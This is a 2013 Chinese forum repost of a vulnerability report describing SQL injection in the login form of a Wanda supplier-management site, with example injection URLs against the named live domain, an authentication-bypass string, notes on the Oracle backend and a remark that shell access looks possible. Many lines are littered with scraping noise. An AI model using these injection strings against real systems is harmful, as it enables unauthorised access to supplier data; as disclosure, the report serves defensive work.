找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2418|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。, i6 L  A  Y4 E7 `
详细说明:
8 c8 Q2 e1 j* U/ V万达scm系统登陆框sql注入。
1 }' R, @$ ]& C: y0 E2 S' u9 @+ P: O& l  H7 G6 |- Q
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27; E2 |( u& A5 U
4 ]* E* o+ g& Q  m: L& }5 I2 W" j

; A5 r8 ?  f+ C6 }; t500错误。  D& B8 H- o( l# y1 E; c
: w1 n, S! r8 p1 X- J, e2 F' K
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。- U6 I. e- X; W8 A9 ], O
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png% A7 G. E7 M% |' Z
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
* ?( j# C) p4 \2 ?# l& u经过分析,登陆验证的过程应该是:
( y0 j, a. {' G. d' C  L; k8 F' r2 L5 h% ]; ]0 ~- T
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。' p, ]+ S0 [7 Z' Z' L1 k  Q
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
5 o  M/ z4 j4 q- D+ \" Y5 b* Z: w' T! v6 @$ Y* n3 x3 H! B
oracle数据库,存在注入点。@大连万达,你怎么看?
2 t5 v9 `4 |1 x9 rhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png7 `1 O" e; l* p/ L  a/ _. Y

$ V& g' Z$ X  Q系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
! x  I" R8 K/ k7 M2 x  _漏洞证明:- p: R# ]% }( ]/ p$ o. z8 a( a, L( u
万达scm系统登陆框sql注入。
' F8 L3 C( H2 g  q& `# f* V5 H1 r3 o
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
( D+ {7 q1 o, ~6 y; _2 F: o. B
4 r: u+ L! G3 v+ E
, p! B4 n) @8 |% b8 Q5 s9 \/ j5 R# j500错误。( r7 D$ ]! a0 f; e! |% n9 f

# l& W: ^. z! M. E# r2 W用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
; |0 a; _8 b; C& s" ~4 o1 Shttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png" L& C& l1 i4 E# R, L; t6 N

1 k  _0 M& _% a, ?, B, K
; g, k6 U8 T6 d4 s  ?3 O6 w(截图有一点问题)! V) d5 k; N8 @$ J" l5 f& D
8 E; d& b$ s% `! `" Y3 ~  y" u
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:1 y5 W# Z, U+ c3 |+ O
# @: N* l" `- S- F
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
9 l) g5 ?- T. X. c5 |# `, ~# S# H7 ]  s4 U7 y
绕过:
5 r( c+ ]4 G2 a) b, p" t, _http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=15 I" h- U3 Q! [) c: n. B" ^/ ~, V; ?

- L' R( \& e% J9 z; E+ G6 B5 l4 e& D2 [7 K* B) P5 M
oracle数据库,存在注入点。@大连万达,你怎么看?
4 D. q% D! c* z4 Y2 h​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
* Q: ]: [! {1 k, J, M2 W9 F- Y6 a4 i& z  Q' e
修复方案:
* o1 v; `+ ~+ o- ]. r/ \7 z+ V。。。
) l7 E; n( {" V6 [  ~4 c0 \. g8 a" n) X$ j; `* \
, ?* l& @3 [1 l$ G# c, x
厂商已经确认
4 X9 C8 z7 F8 l. {1 G
( S0 t8 ?( R) n! g5 `; J# N7 G  ^. R' J[/td][/tr]  k9 L9 {: L5 W4 E# V% _9 o
[/table]
+ N/ e4 v8 l! B: L# y; o! d
2 T9 c, s: U& b- m8 }4 J! y" s( j# i  O, M' K( f. X8 O9 h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表